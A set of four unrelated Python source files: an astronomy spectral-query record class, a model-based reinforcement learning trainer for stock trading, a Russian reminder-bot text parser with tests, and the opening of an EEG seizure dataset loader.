"ssa:Char.SpatialAxis.Calibration": self.fieldname_with_utype("ssa:Char.SpatialAxis.Calibration"),
"ssa:Char.SpatialAxis.Resolution": self.fieldname_with_utype("ssa:Char.SpatialAxis.Resolution"),
"ssa:Char.SpectralAxis.Name": self.fieldname_with_utype("ssa:Char.SpectralAxis.Name"),
"ssa:Char.SpectralAxis.Ucd": self.fieldname_with_utype("ssa:Char.SpectralAxis.Ucd"),
"ssa:Char.SpectralAxis.Unit": self.fieldname_with_utype("ssa:Char.SpectralAxis.Unit"),
"ssa:Char.SpectralAxis.Coverage.Location.Value": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Location.Value"),
"ssa:Char.SpectralAxis.Coverage.Bounds.Extent": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Bounds.Extent"),
"ssa:Char.SpectralAxis.Coverage.Bounds.Start": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Bounds.Start"),
"ssa:Char.SpectralAxis.Coverage.Bounds.Stop": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Bounds.Stop"),
"ssa:Char.SpectralAxis.Coverage.Support.Extent": self.fieldname_with_utype("ssa:Char.SpectralAxis.Coverage.Support.Extent"),
"ssa:Char.SpectralAxis.SamplingPrecision.SampleExtent": self.fieldname_with_utype("ssa:Char.SpectralAxis.SamplingPrecision.SampleExtent"),
"ssa:Char.SpectralAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor": self.fieldname_with_utype("ssa:Char.SpectralAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor"),
"ssa:Char.SpectralAxis.Accuracy.BinSize": self.fieldname_with_utype("ssa:Char.SpectralAxis.Accuracy.BinSize"),
"ssa:Char.SpectralAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Char.SpectralAxis.Accuracy.StatError"),
"ssa:Char.SpectralAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Char.SpectralAxis.Accuracy.SysError"),
"ssa:Char.SpectralAxis.Calibration": self.fieldname_with_utype("ssa:Char.SpectralAxis.Calibration"),
"ssa:Char.SpectralAxis.Resolution": self.fieldname_with_utype("ssa:Char.SpectralAxis.Resolution"),
"ssa:Char.SpectralAxis.ResPower": self.fieldname_with_utype("ssa:Char.SpectralAxis.ResPower"),
"ssa:Char.TimeAxis.Name": self.fieldname_with_utype("ssa:Char.TimeAxis.Name"),
"ssa:Char.TimeAxis.Ucd": self.fieldname_with_utype("ssa:Char.TimeAxis.Ucd"),
"ssa:Char.TimeAxis.Unit": self.fieldname_with_utype("ssa:Char.TimeAxis.Unit"),
"ssa:Char.TimeAxis.Coverage.Location.Value": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Location.Value"),
"ssa:Char.TimeAxis.Coverage.Bounds.Extent": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Bounds.Extent"),
"ssa:Char.TimeAxis.Coverage.Bounds.Start": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Bounds.Start"),
"ssa:Char.TimeAxis.Coverage.Bounds.Stop": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Bounds.Stop"),
"ssa:Char.TimeAxis.Coverage.Support.Extent": self.fieldname_with_utype("ssa:Char.TimeAxis.Coverage.Support.Extent"),
"ssa:Char.TimeAxis.SamplingPrecision.SampleExtent": self.fieldname_with_utype("ssa:Char.TimeAxis.SamplingPrecision.SampleExtent"),
"ssa:Char.TimeAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor": self.fieldname_with_utype("ssa:Char.TimeAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor"),
"ssa:Char.TimeAxis.Accuracy.BinSize": self.fieldname_with_utype("ssa:Char.TimeAxis.Accuracy.BinSize"),
"ssa:Char.TimeAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Char.TimeAxis.Accuracy.StatError"),
"ssa:Char.TimeAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Char.TimeAxis.Accuracy.SysError"),
"ssa:Char.TimeAxis.Calibration": self.fieldname_with_utype("ssa:Char.TimeAxis.Calibration"),
"ssa:Char.TimeAxis.Resolution": self.fieldname_with_utype("ssa:Char.TimeAxis.Resolution"),
"ssa:Char.FluxAxis.Name": self.fieldname_with_utype("ssa:Char.FluxAxis.Name"),
"ssa:Char.FluxAxis.Ucd": self.fieldname_with_utype("ssa:Char.FluxAxis.Ucd"),
"ssa:Char.FluxAxis.Unit": self.fieldname_with_utype("ssa:Char.FluxAxis.Unit"),
"ssa:Char.FluxAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Char.FluxAxis.Accuracy.StatError"),
"ssa:Char.FluxAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Char.FluxAxis.Accuracy.SysError"),
"ssa:Char.FluxAxis.Calibration": self.fieldname_with_utype("ssa:Char.FluxAxis.Calibration"),
"ssa:Data.SpectralAxis.Value": self.fieldname_with_utype("ssa:Data.SpectralAxis.Value"),
"ssa:Data.SpectralAxis.Ucd": self.fieldname_with_utype("ssa:Data.SpectralAxis.Ucd"),
"ssa:Data.SpectralAxis.Unit": self.fieldname_with_utype("ssa:Data.SpectralAxis.Unit"),
"ssa:Data.SpectralAxis.Accuracy.BinSize": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.BinSize"),
"ssa:Data.SpectralAxis.Accuracy.BinLow": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.BinLow"),
"ssa:Data.SpectralAxis.Accuracy.BinHigh": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.BinHigh"),
"ssa:Data.SpectralAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.StatError"),
"ssa:Data.SpectralAxis.Accuracy.StatErrLow": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.StatErrLow"),
"ssa:Data.SpectralAxis.Accuracy.StatErrHigh": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.StatErrHigh"),
"ssa:Data.SpectralAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Data.SpectralAxis.Accuracy.SysError"),
"ssa:Data.SpectralAxis.Resolution": self.fieldname_with_utype("ssa:Data.SpectralAxis.Resolution"),
"ssa:Data.FluxAxis.Value": self.fieldname_with_utype("ssa:Data.FluxAxis.Value"),
"ssa:Data.FluxAxis.Ucd": self.fieldname_with_utype("ssa:Data.FluxAxis.Ucd"),
"ssa:Data.FluxAxis.Unit": self.fieldname_with_utype("ssa:Data.FluxAxis.Unit"),
"ssa:Data.FluxAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Data.FluxAxis.Accuracy.StatError"),
"ssa:Data.FluxAxis.Accuracy.StatErrLow": self.fieldname_with_utype("ssa:Data.FluxAxis.Accuracy.StatErrLow"),
"ssa:Data.FluxAxis.Accuracy.StatErrHigh": self.fieldname_with_utype("ssa:Data.FluxAxis.Accuracy.StatErrHigh"),
"ssa:Data.FluxAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Data.FluxAxis.Accuracy.SysError"),
"ssa:Data.FluxAxis.Quality": self.fieldname_with_utype("ssa:Data.FluxAxis.Quality"),
"ssa:Data.FluxAxis.Quality.n": self.fieldname_with_utype("ssa:Data.FluxAxis.Quality.n"),
"ssa:Data.TimeAxis.Value": self.fieldname_with_utype("ssa:Data.TimeAxis.Value"),
"ssa:Data.TimeAxis.Ucd": self.fieldname_with_utype("ssa:Data.TimeAxis.Ucd"),
"ssa:Data.TimeAxis.Unit": self.fieldname_with_utype("ssa:Data.TimeAxis.Unit"),
"ssa:Data.TimeAxis.Accuracy.BinSize": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.BinSize"),
"ssa:Data.TimeAxis.Accuracy.BinLow": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.BinLow"),
"ssa:Data.TimeAxis.Accuracy.BinHigh": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.BinHigh"),
"ssa:Data.TimeAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.StatError"),
"ssa:Data.TimeAxis.Accuracy.StatErrLow": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.StatErrLow"),
"ssa:Data.TimeAxis.Accuracy.StatErrHigh": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.StatErrHigh"),
"ssa:Data.TimeAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Data.TimeAxis.Accuracy.SysError"),
"ssa:Data.TimeAxis.Resolution": self.fieldname_with_utype("ssa:Data.TimeAxis.Resolution"),
"ssa:Data.BackgroundModel.Value": self.fieldname_with_utype("ssa:Data.BackgroundModel.Value"),
"ssa:Data.BackgroundModel.Ucd": self.fieldname_with_utype("ssa:Data.BackgroundModel.Ucd"),
"ssa:Data.BackgroundModel.Unit": self.fieldname_with_utype("ssa:Data.BackgroundModel.Unit"),
"ssa:Data.BackgroundModel.Accuracy.StatError": self.fieldname_with_utype("ssa:Data.BackgroundModel.Accuracy.StatError"),
"ssa:Data.BackgroundModel.Accuracy.StatErrLow": self.fieldname_with_utype("ssa:Data.BackgroundModel.Accuracy.StatErrLow"),
"ssa:Data.BackgroundModel.Accuracy.StatErrHigh": self.fieldname_with_utype("ssa:Data.BackgroundModel.Accuracy.StatErrHigh"),
"ssa:Data.BackgroundModel.Accuracy.SysError": self.fieldname_with_utype("ssa:Data.BackgroundModel.Accuracy.SysError"),
"ssa:Data.BackgroundModel.Quality": self.fieldname_with_utype("ssa:Data.BackgroundModel.Quality")
}
self._recnames = { "title": self._ssacols["ssa:DataID.Title"],
# RA and Dec are not separately specified
"pos": self._ssacols["ssa:Target.Pos"],
"instr": self._ssacols["ssa:DataID.Instrument"],
# This does not exist specifically in SSA but the closest is
"dateobs": self._ssacols["ssa:DataID.Date"],
"format": self._ssacols["ssa:Access.Format"],
"acref": self._ssacols["ssa:Access.Reference"]
}
def getrecord(self, index):
"""
return an SSA result record that follows dictionary
semantics. The keys of the dictionary are those returned by this
instance's fieldNames() function: either the column IDs or name, if
the ID is not set. The returned record has additional accessor
methods for getting at standard SSA response metadata (e.g. ra, dec).
Parameters
----------
index : int
the integer index of the desired record where 0 returns the first
record
Returns
-------
SSARecord
a distionary-like record containing the image metadata from
the requested record.
See Also
--------
SSARecord
"""
return SSARecord(self, index)
class SSARecord(query.Record):
"""
a dictionary-like container for data in a record from the results of an
SSA query, describing an available spectrum.
The commonly accessed metadata which are stadardized by the SSA
protocol are available as attributes. If the metadatum accessible
via an attribute is not available, the value of that attribute
will be None. All metadata, including non-standard metadata, are
acessible via the ``get(`` *key* ``)`` function (or the [*key*]
operator) where *key* is table column name.
"""
def __init__(self, results, index):
super(SSARecord, self).__init__(results, index)
self._utypecols = results._ssacols
self._names = results._recnames
@property
def ra(self):
"""
return the right ascension of the center of the spectrum
"""
return self.get(self._names["pos"])[0]
@property
def dec(self):
"""
return the declination of the center of the spectrum
"""
return self.get(self._names["pos"])[1]
@property
def title(self):
"""
return the title of the spectrum
"""
return self.get(self._names["title"])
@property
def format(self):
"""
return the file format that this the spectrum is stored in
"""
return self.get(self._names["format"])
@property
def dateobs(self):
"""
return the modified Julien date (MJD) of the mid-point of the
observational data that went into the spectrum
"""
return self.get(self._names["dateobs"])
@property
def instr(self):
"""
return the name of the instrument (or instruments) that produced the
data that went into this spectrum.
"""
return self.get(self._names["instr"])
@property
def acref(self):
"""
return the URL that can be used to retrieve the spectrum.
Note that this will always be returned as a native string--i.e. as
unicode for Python 3 and as a byte-string for Python 2--making ready
to use as a URL with urllib functions.
"""
return self._get_to_str(self._names["acref"])
def getdataurl(self):
"""
return the URL contained in the access URL column which can be used
to retrieve the dataset described by this record. None is returned
if no such column exists.
Note that this will always be returned as a native string--i.e. as
unicode for Python 3 and as a byte-string for Python 2--making ready
to use as a URL with urllib functions.
"""
return self.acref
def suggest_dataset_basename(self):
"""
return a default base filename that the dataset available via
``getdataset()`` can be saved as. This function is
specialized for a particular service type this record originates from
so that it can be used by ``cachedataset()`` via
``make_dataset_filename()``.
"""
out = self.title
if query._is_python3 and isinstance(out, bytes):
out = out.decode('utf-8')
if not out:
out = "spectrum"
else:
out = re.sub(r'\s+', '_', out.strip())
return out
def suggest_extension(self, default=None):
"""
returns a recommended filename extension for the dataset described
by this record. Typically, this would look at the column describing
the format and choose an extension accordingly.
"""
return query.mime2extension(self.format, default)
|
import numpy as np
from datetime import datetime, timedelta # 记录outputs_time,记录循环用时
from typing import Optional, Tuple, cast
import hydra.utils
import numpy as np
import omegaconf
from omegaconf import dictconfig
import torch
import math
# matplotlib.use('Agg')
#%matplotlib inline
import torch
import omegaconf
from pathlib import Path
import logging
import shutil
import sys, os
import pickle
import plot
import analysis
current_dir = Path(os.path.realpath("."))
from finrl.neo_finrl.preprocessor.yahoodownloader import YahooDownloader
from finrl.neo_finrl.preprocessor.preprocessors import FeatureEngineer
from mbrl.models import (
OneDTransitionRewardModel,
ModelEnv,
ModelTrainer,
)
import mbrl.types as mbrl_types
import mbrl.util as mbrl_util
import mbrl.util.common as mbrl_common
import mbrl.constants as mbrl_constants
import mbrl.planning as mbrl_planning
from mbrl.util import ReplayBuffer
import mbrl.third_party.pytorch_sac as pytorch_sac
from env_stocktrading import StockTradingEnv
import plot
from mbrl_fin import MBRLFin
MBPO_LOG_FORMAT = mbrl_constants.EVAL_LOG_FORMAT + [
("epoch", "E", "int"),
("rollout_length", "RL", "int"),
]
class MBPOFin(MBRLFin):
def __init__(
self,
cfg: omegaconf.dictconfig,
flogger: logging.Logger,
checkpoint_dir: Path,
checkpoint: str = None,
):
super().__init__(cfg, flogger, checkpoint_dir, checkpoint)
self.dynamics_model: OneDTransitionRewardModel = None
self.agent: pytorch_sac.SACAgent = None
self.dynamics_model_stat = []
def create_models(self, env: StockTradingEnv):
mbrl_planning.complete_agent_cfg(env, self.cfg.algorithm.agent)
self.agent: pytorch_sac.SACAgent = hydra.utils.instantiate(
self.cfg.algorithm.agent
)
self.dynamics_model: OneDTransitionRewardModel = (
mbrl_common.create_one_dim_tr_model(
self.cfg, env.observation_space.shape, env.action_space.shape
)
)
def save_checkpiont(self):
time_current = datetime.now() + timedelta(hours=8)
time_current = time_current.strftime("%Y-%m-%d_%H:%M:%f")
save_dir = (
self.checkpoint_dir
/ f"{self.cfg.algorithm.name}_{self.cfg.market.name}_{time_current}"
)
save_dir.mkdir(parents=True, exist_ok=True)
# save configs
config_file = "config.yaml"
config_path = Path(f"./.hydra/{config_file}")
shutil.copyfile(config_path, save_dir / f"{config_file}")
# save env model
self.dynamics_model.save(save_dir)
# save sac
self.agent.save(save_dir)
def load_checkpoint(self):
checkpoint = self.checkpoint_dir / self.checkpoint
assert checkpoint.is_dir()
config_file = "config.yaml"
config_path = Path(f"./.hydra/{config_file}")
shutil.copyfile(checkpoint / f"{config_file}", config_path)
self.dynamics_model.load(checkpoint)
self.agent.load(checkpoint)
def rollout_model_and_populate_sac_buffer(
self,
model_env: ModelEnv,
replay_buffer: ReplayBuffer,
sac_buffer: pytorch_sac.ReplayBuffer,
sac_samples_action: bool,
rollout_horizon: int,
batch_size: int,
):
batch = replay_buffer.sample(batch_size)
initial_obs, *_ = cast(mbrl_types.TransitionBatch, batch).astuple()
obs = model_env.reset(
initial_obs_batch=cast(np.ndarray, initial_obs),
return_as_np=True,
)
accum_dones = np.zeros(obs.shape[0], dtype=bool)
accum_masked = np.ones(obs.shape[0], dtype=bool)
# dynamic model stats
current_obs = []
current_actions = []
next_obs = []
next_rewards = []
next_dones = []
for i in range(rollout_horizon):
action = self.agent.act(obs, sample=sac_samples_action, batched=True)
model_env.dynamics_model.model.update_mask_ratio(rollout_horizon, i)
current_obs.append(model_env._current_obs.clone().detach().cpu())
current_actions.append(action)
pred_next_obs, pred_rewards, pred_dones, _ = model_env.step(
action, sample=True
)
next_obs.append(pred_next_obs)
next_rewards.append(pred_rewards)
next_dones.append(pred_dones)
filters = ~accum_dones
# only for "mask"
if self.cfg.dynamics_model.model.propagation_method == "mask":
mask = model_env.dynamics_model.model.mask.cpu().detach().numpy()
uncertainty = (
model_env.dynamics_model.model.uncertainty.cpu()
.detach()
.unsqueeze(1)
.numpy()
)
pred_rewards -= uncertainty * self.cfg.dynamics_model.mask_penalty
accum_masked &= mask
if self.cfg.dynamics_model.mask_mode == "nonstop":
filters &= mask
elif self.cfg.dynamics_model.mask_mode == "hardstop":
filters &= accum_masked
else:
assert "Unknown mask mode."
pred_dones = pred_dones.reshape((pred_dones.shape[0], 1))
sac_buffer.add_batch(
obs[filters],
action[filters],
pred_rewards[filters],
pred_next_obs[filters],
pred_dones[filters],
pred_dones[filters],
)
obs = pred_next_obs
# must not done
accum_dones &= ~pred_dones.squeeze()
self.dynamics_model_stat.append(
{
"initial_batch":batch,
"obs":np.concatenate(current_obs,axis=0),
"actions":np.concatenate(current_actions, axis=0),
"next_obs":np.concatenate(next_obs, axis=0),
"next_rewards":np.concatenate(next_rewards, axis=0),
"next_dones":np.concatenate(next_dones, axis=0),
}
)
def maybe_replace_sac_buffer(
self,
sac_buffer: Optional[pytorch_sac.ReplayBuffer],
new_capacity: int,
obs_shape: Tuple[int],
act_shape: Tuple[int],
):
if sac_buffer is None or new_capacity != sac_buffer.capacity:
new_buffer = pytorch_sac.ReplayBuffer(
obs_shape, act_shape, new_capacity, self.cfg.device
)
if sac_buffer is None:
return new_buffer
n = len(sac_buffer)
new_buffer.add_batch(
sac_buffer.obses[:n],
sac_buffer.actions[:n],
sac_buffer.rewards[:n],
sac_buffer.next_obses[:n],
np.logical_not(sac_buffer.not_dones[:n]),
np.logical_not(sac_buffer.not_dones_no_max[:n]),
)
return new_buffer
return sac_buffer
def termination_fn(self, actions: torch.tensor, next_observs: torch.tensor):
return torch.full((actions.shape[0], 1), False, device=actions.device)
def save_stats(self):
with open("mbpo_stats.pkl", "wb") as f:
pickle.dump(self.dynamics_model_stat, f)
def train(
self,
train_env: StockTradingEnv,
val_env: StockTradingEnv,
):
obs_shape = train_env.observation_space.shape
act_shape = train_env.action_space.shape
self.agent.stat_path = "Q_loss.npy"
# if os.path.exists(critic_path):
# agent.critic.load_state_dict(torch.load(critic_path))
# if os.path.exists(actor_path):
# agent.actor.load_state_dict(torch.load(actor_path))
# """
work_dir = os.getcwd()
# enable_back_compatible to use pytorch_sac agent
logger = mbrl_util.Logger(work_dir, enable_back_compatible=True)
logger.register_group(
mbrl_constants.RESULTS_LOG_NAME,
MBPO_LOG_FORMAT,
color="green",
dump_frequency=1,
)
rng = np.random.default_rng(seed=self.cfg.seed)
torch_generator = torch.Generator(device=self.cfg.device)
if self.cfg.seed is not None:
torch_generator.manual_seed(self.cfg.seed)
# -------------- Create initial overrides. dataset --------------
use_double_dtype = self.cfg.algorithm.get("normalize_double_precision", False)
dtype = np.double if use_double_dtype else np.float32
replay_buffer: ReplayBuffer = mbrl_common.create_replay_buffer(
self.cfg,
obs_shape,
act_shape,
rng=rng,
obs_type=dtype,
action_type=dtype,
reward_type=dtype,
)
random_explore = self.cfg.algorithm.random_initial_explore
self.flogger.info("rollout_agent_trajectories ...")
mbrl_common.rollout_agent_trajectories(
train_env,
self.cfg.algorithm.initial_exploration_steps, # 从真实环境中采样的长度,可能要使用整个train data的天数
mbrl_planning.RandomAgent(train_env) if random_explore else self.agent,
{} if random_explore else {"sample": True, "batched": False},
replay_buffer=replay_buffer,
)
epoch_length = self.cfg.overrides.epoch_length
# epoch_length = len(env.dates)
# ---------------------------------------------------------
# --------------------- Training Loop ---------------------
rollout_batch_size = (
self.cfg.overrides.effective_model_rollouts_per_step
* self.cfg.algorithm.freq_train_model
)
trains_per_epoch = int(
np.ceil(epoch_length / self.cfg.overrides.freq_train_model)
)
updates_made = 0
env_steps = 0
model_env = ModelEnv(
train_env,
self.dynamics_model,
self.termination_fn,
None,
generator=torch_generator,
)
model_trainer = ModelTrainer(
self.dynamics_model,
optim_lr=self.cfg.overrides.model_lr,
weight_decay=self.cfg.overrides.model_wd,
logger=logger,
)
metric_best = (-np.inf, -np.inf, -np.inf)
epoch = 0
sac_buffer = None
early_stop = False
eval_times = 0
metric_buff = []
while env_steps < self.cfg.overrides.num_steps and not early_stop:
# 此处决定了rollout的步长,现有逻辑恒定为epoch + 1,因为cfg.overrides.rollout_schedule=[1,15,1,1],可能要进行修改
# 具体数学逻辑参考/mnt/guiyi/hhf/mbrl/mbrl/util/math.py:16 truncated_linear
if self.cfg.overrides.dynamic_rollout:
rollout_length = int(
mbrl_util.truncated_linear(
1,
math.ceil(self.cfg.overrides.num_steps / epoch_length),
self.cfg.overrides.rollout_schedule[0],
self.cfg.overrides.rollout_schedule[1],
epoch + 1,
)
)
else:
rollout_length = 1
if self.cfg.dynamics_model.model.propagation_method == "mask":
sac_buffer_capacity = (
rollout_length
* max(
1,
int(
rollout_batch_size
* self.cfg.dynamics_model.model.min_mask_ratio
),
)
* trains_per_epoch
)
else:
sac_buffer_capacity = (
rollout_length * rollout_batch_size * trains_per_epoch
)
sac_buffer_capacity *= self.cfg.overrides.num_epochs_to_retain_sac_buffer
sac_buffer = self.maybe_replace_sac_buffer(
sac_buffer,
sac_buffer_capacity,
obs_shape,
act_shape,
)
obs, done = None, False
for steps_epoch in range(epoch_length):
if (
steps_epoch == 0 or done
): # 则最多只会利用env中的epoch_length天的数据进行step,可能要改为train data的全部天数
self.flogger.info("reset train env")
obs, done = train_env.reset(), False
# --- Doing env step and adding to model dataset ---
next_obs, reward, done, _ = mbrl_common.step_env_and_add_to_buffer(
train_env, obs, self.agent, {}, replay_buffer
)
# --------------- Model Training -----------------
if (
env_steps + 1
) % self.cfg.overrides.freq_train_model == 0: # 环境模型的训练频率,根据总的step数目来确定
self.flogger.info("training dynamic model ...")
mbrl_common.train_model_and_save_model_and_data(
self.dynamics_model,
model_trainer,
self.cfg.overrides,
replay_buffer,
work_dir=work_dir,
)
# --------- Rollout new model and store imagined trajectories --------
# Batch all rollouts for the next freq_train_model steps together
self.flogger.info(f"env_steps: {env_steps}, rollout ...")
self.rollout_model_and_populate_sac_buffer(
model_env,
replay_buffer,
sac_buffer,
self.cfg.algorithm.sac_samples_action,
rollout_length, # rollout步长
rollout_batch_size, # batch
)
# --------------- Agent Training -----------------
for _ in range(
self.cfg.overrides.num_sac_updates_per_step
): # 每次step中,agent更新的次数
if (
env_steps + 1
) % self.cfg.overrides.sac_updates_every_steps != 0 or len(
sac_buffer
) < rollout_batch_size:
break # only update every once in a while
self.agent.update(sac_buffer, logger, updates_made)
updates_made += 1
if updates_made % self.cfg.log_frequency_agent == 0:
logger.dump(updates_made, save=True)
# ------ Epoch ended (evaluate and save model) ------
if (env_steps + 1) % self.cfg.overrides.freq_evaluate == 0: # 进行估值评价的频率
self.flogger.info(f"env_steps: {env_steps}, evaluating ...")
_, df_stat, pred_actions = self.evaluate(val_env)
#当年收益大于14%,sharpe>1,max_drawdown>-0.1,且保持此状态超过4次evaluae
target_metric = list(self.cfg.overrides.target_metric)#(0.16, 1.2, -0.11)
# aunual_return, sharpe, max_drawdown = stats[0], stats[3],stats[6]
metric = [df_stat[0], df_stat[3], df_stat[6]]
#存放最近的几次metric结果
buff_size = 3
if len(metric_buff) <buff_size:
metric_buff.append(metric)
else:
metric_buff[eval_times%buff_size]=metric
eval_times += 1
self.flogger.info(f"metric_buff: {metric_buff}, targe: {target_metric}")
if len(metric_buff)==buff_size:
all_match = True
for i in range(len(metric_buff)):
if metric_buff[i]<target_metric:
all_match = False
break
self.print_movement_stats(val_env, pred_actions)
if (
env_steps > self.cfg.overrides.save_min_steps
and all_match
):
self.flogger.info(f"do early stop, steps: {env_steps} .")
metric_best = metric
self.save_checkpiont()
early_stop = True and self.cfg.overrides.use_earlystop
break
env_steps += 1
obs = next_obs
epoch += 1
self.flogger.info("train done.")
self.agent.save_stats()
plot.draw_loss(self.agent.stat_path)
#这个统计结果的数据很大,可能十几个G以上,默认不会存下来。
if self.cfg.overrides.save_rollout_stats:
self.save_stats()
analysis.draw(self.dynamics_model_stat, Path("./"))
return np.float32(metric_best)
|
# coding:utf-8
__author__ = '4ikist'
import re
def retrieve_type(text):
found = re.findall(u"(\!{1,3})", text, re.IGNORECASE)
if found:
groups = found[0]
return len(groups)
return 1
def retrieve_notification_message(text):
found = re.findall(u".*\:\s(.*)", text)
if found:
return found[0].strip()
def retrieve_yes(text):
found = re.findall(u"((да)|(ок)|(ok)|(yes)|(хорошо)|(\:\))|(\))|(ладно)|(давай)|(щл)|(lf))", text, re.IGNORECASE)
if found:
return True
def retrieve_utc(text):
found = re.findall(u"[-+]?\d+", text)
if found:
return int(text)
def retrieve_set_utc(text):
found = re.findall(u"(set utc )([-+]?\d+)", text)
if found:
groups = found[0]
return int(groups[1])
def retrieve_mentioned(text):
found = re.match(u"для\s(?P<names>.*)\sнапомни", text, re.IGNORECASE)
if found:
names_str = found.group('names')
names = names_str.split(',')
result = []
for name in names:
name = name.strip()
if re.match(u'id\d+', name):
result.append({'id': name[2:]})
elif re.match(u'^[a-z0-9_\.]+$', name):
result.append({'domain': name})
else:
result.append({'name': name.split()})
return result
if __name__ == '__main__':
assert retrieve_type(u'hui') == 1
assert retrieve_type(u'hui!') == 1
assert retrieve_type(u'hui!!') == 2
assert retrieve_type(u'hui!!!') == 3
assert retrieve_notification_message(
u"напомни мне в 22:30 что: тебе нужно пойти спать") == u"тебе нужно пойти спать"
assert retrieve_yes(u"пиздец да!")
assert retrieve_yes(u"пиздец хорошо!")
assert retrieve_yes(u"ладно")
assert retrieve_yes(u"ок")
assert retrieve_yes(u"ok!")
assert retrieve_yes(u"давай")
assert retrieve_yes(u")")
assert retrieve_yes(u":)")
assert retrieve_yes(u"lf")
assert not retrieve_yes(u'нет')
assert retrieve_set_utc(u'set utc +6') == 6
assert retrieve_set_utc(u'+6') == None
assert retrieve_set_utc(u'-6') == None
assert retrieve_utc(u'+6') == 6
assert retrieve_mentioned(u"для 4ikist, sederfes напомни") == [{'domain': u'4ikist'}, {'domain': u'sederfes'}]
assert retrieve_mentioned(u"для алины луценко напомни") == [{'name': [u'алины', u'луценко']}]
assert retrieve_mentioned(u"для алины луценко напомни") == [{'name': [u'алины', u'луценко']}]
assert retrieve_mentioned(u"для меня, <NAME> напомни") == [{'name': [u'меня']},
{'name': [u'enjoily', u'prigmann']}]
assert retrieve_mentioned(u"для id12345, луценко напомни") == [{'id': u'12345'}, {'name': [u'луценко']}, ]
|
import sys
sys.path.append('../')
from pathlib import Path
import scipy.signal
import scipy
import pickle
import os
import numpy as np
import h5py
import math
import torch
from torch.utils.data import Dataset, DataLoader
from utils import StandardScaler
from constants import INCLUDED_CHANNELS, FREQUENCY
from data.data_utils import *
import utils
import pyedflib
repo_paths = str(Path.cwd()).split('eeg-gnn-ssl')
repo_paths = Path(repo_paths[0]).joinpath('eeg-gnn-ssl')
sys.path.append(repo_paths)
FILEMARKER_DIR = Path(repo_paths).joinpath('data/file_markers_ssl')
def computeSliceMatrix(
h5_fn,
edf_fn,
clip_idx,
time_step_size=1,
clip_len=60,
is_fft=False):
"""
Comvert entire EEG sequence into clips of length clip_len
Args:
h5_fn: file name of resampled signal h5 file (full path)
clip_idx: index of current clip/sliding window
time_step_size: length of each time_step_size, in seconds, int
clip_len: sliding window size or EEG clip length, in seconds, int
is_fft: whether to perform FFT on raw EEG data
Returns:
eeg_clip: eeg clip, shape (clip_len, num_channels, time_step_size*freq)
"""
with h5py.File(h5_fn, 'r') as f:
signal_array = f["resampled_signal"][()]
resampled_freq = f["resample_freq"][()]
assert resampled_freq == FREQUENCY
# get seizure times
seizure_times = getSeizureTimes(edf_fn.split('.edf')[0])
# Iterating through signal
physical_clip_len = int(FREQUENCY * clip_len)
physical_time_step_size = int(FREQUENCY * time_step_size)
start_window = clip_idx * physical_clip_len
end_window = start_window + physical_clip_len
# (num_channels, physical_clip_len)
curr_slc = signal_array[:, start_window:end_window]
start_time_step = 0
time_steps = []
while start_time_step <= curr_slc.shape[1] - physical_time_step_size:
end_time_step = start_time_step + physical_time_step_size
# (num_channels, physical_time_step_size)
curr_time_step = curr_slc[:, start_time_step:end_time_step]
if is_fft:
curr_time_step, _ = computeFFT(
curr_time_step, n=physical_time_step_size)
time_steps.append(curr_time_step)
start_time_step = end_time_step
eeg_clip = np.stack(time_steps, axis=0)
return eeg_clip
class SeizureDataset(Dataset):
def __init__(
self,
input_dir,
raw_data_dir,
time_step_size=1,
input_len=60,
output_len=12,
standardize=True,
scaler=None,
split='train',
data_augment=False,
adj_mat_dir=None,
graph_type=None,
top_k=None,
filter_type='laplacian',
use_fft=False,
preproc_dir=None):
"""
Args:
input_dir: dir to resampled signals h5 files
raw_data_dir: dir to TUSZ edf files
time_step_size: int, in seconds
input_len: int, input EEG clip length, in seconds
output_len: int, output EEG clip length, in seconds
standardize: if True, will z-normalize wrt train set
scaler: scaler object for standardization
split: train, dev or test
data_augment: if True, perform random augmentation on EEG
adj_mat_dir: dir to pre-computed distance graph adjacency matrix
graph_type: 'combined' (i.e. distance graph) or 'individual' (correlation graph)
top_k: int, top-k neighbors of each node to keep. For correlation graph only
filter_type: 'laplacian' for distance graph, 'dual_random_walk' for correlation graph
use_fft: whether perform Fourier transform
preproc_dir: dir to preprocessed Fourier transformed data, optional
"""
if standardize and (scaler is None):
raise ValueError('To standardize, please provide scaler.')
if (graph_type == 'individual') and (top_k is None):
raise ValueError('Please specify top_k for individual graph.')
self.input_dir = input_dir
self.raw_data_dir = raw_data_dir
self.time_step_size = time_step_size
self.input_len = input_len
self.output_len = output_len
self.standardize = standardize
self.scaler = scaler
self.split = split
self.data_augment = data_augment
self.adj_mat_dir = adj_mat_dir
